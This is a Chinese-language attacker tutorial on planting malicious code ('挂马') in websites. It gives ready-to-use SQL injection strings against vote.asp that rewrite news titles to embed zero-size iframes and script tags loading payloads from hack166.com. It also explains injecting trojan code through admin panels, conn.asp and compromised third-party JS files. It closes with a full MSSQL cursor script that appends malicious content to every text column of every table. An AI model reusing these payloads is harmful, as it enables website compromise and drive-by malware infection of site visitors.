这里说的是首页调用到的数据库，比如新闻，论坛，公告，等等，一般是标题。这些需要经验去检测，举个例子，比如首页有一条新闻为：“明日开业 ”，那么鼠标点此新闻，地址栏打开的新窗口为news.asp?id=1，这种情况，这时，就可以判断此新闻是从数据库中调用的了，当然了，我们不说 access，只说mssql。
首页，我们要有这个网站中的一个注入点，比如就点在vote.asp?id=123，同时，至少是 Db_owner权限，这时如果要挂马可以不用取到webshell，因为如果我们的目的只在于挂马的话，而且有时，还得检测mssql数据库和web服 务器不在同一个机器上，那挂马的方式就是更改数据库内容，这里我说的就是这种，如上面说的，首页显示的一条新闻标题为“明日开业”，如果首页显示的标题是 “明日开业</a><iframe src=http://www.hack166.com/mm.htm width=0 height=0></iframe>”，

那这样的话，首页就会执行这段代码了，像这种情况，找到了注入点，就得找表名，如此新闻的表名为news，字段为title，id,等等，根据猜 测,id=1时，暴出的字段title的值就为“明日开业”，那么90%就可以猜到了，首页调用的数据库的字段就为news表中的title，这时在注入 点，可以大胆提交vote.asp?id=123;update news set title='明日开业</a><iframe

src=http://www.hack166.com/mm.htm width=0 height=0></iframe>'

where id=1;--，这样就可以更改数据库了，前提是最少要少db_owner权限，当然也有时由于代码原因，也可以这样提交:vote.asp?id=123';update news set title='明日开业</a><ifrmae

src=http://www.hack166.com/mm.htm width=0 height=0></iframe>'where id=1 and'1'='1，也可以...
这种方法是有问题的，实战中存在不少问题，因为一般的情况下，标题都是通过<table>来限制宽度，也就是说如果你的标题的长度超过了指 定的长度，那么你的代码只能写一半，这样就不能执行了，所以挂马最好的方法是用<script>这种方法来挂马了， 如:vote.asp?id=123;update news set title='明日开业</a><script

src=http://www.hack166.com/mm.js></script>' where id=1;--长度有很大的减少，很不错。

后台挂马
通常注入等不到webshell，就只能靠进后台挂马。

这里说的是进入了后台，但不能通过后台得到webshell，这时要仔细关察后台，像比较网站的链接、顶部底部的广告、都可以直接写入你的木马代 码，等等，后台是灵活的，具体问题具体分析。不过有一点很重要，是不要打乱前台htm源文件里的代码逻辑，比如应该闭合前面 的<a><img>"( 等这些符号，应该先闭合掉如</a></img>")。

其它形式如一首页调用了<iframe src="/vote.asp?id=1&";no=view width=100></iframe>此种形势，一样可以在vote.asp中直接写入iframe木马代码，如果调用的是

<script

src="/vote.asp?id=1&";no=view width=100></script>在vote.asp写代码时，请用

document.write("")这种格式写入，当然，如果被挂文件中还有调用的文件可以继续往深处写，如果你够狠的话，直接写到数据库配置文 件中，如conn.asp，这样好多页面可以同时挂上你的一种木马了。当然这里也有js文件，一样原理。挂一个网站的马，不一定就得攻入他，有时没有方法 的同时，可以考虑跨站。好多站用了别的站的js文件，如:<script src=http://www.163.com/user.js>这种情势，这时就可以考虑只拿163.com的权限就行了，只要能修改到 user.js文件就可以挂到你要挂的站点了，同理，也有<iframe src=http://www.163.com/user.htm>此种情况，一样道理，剑走偏锋，达到目的，无论用什么招数了上面的是注入，下面 的的没看懂，估计是拿到服务器才行的

_________________________

以前说过的趋势挂马事件，MS这个挂马方法已经流行了很久，从去年就大规模开始了，在网上可以搜到很多痕迹。

SQL语句如下：

用游标遍历所有表里如下数据类型的字段，然后Update挂马。（全部是允许写入字符的字段）

xtype=99 ntext

xtype=35 text

xtype=231 nvarchar

xtype=167 varchar

———————YD的分割——————————–

DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update [’+@T+’] set [’+@C+’]=
rtrim(convert(varchar,[’+@C+’]))+
”挂马内容”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor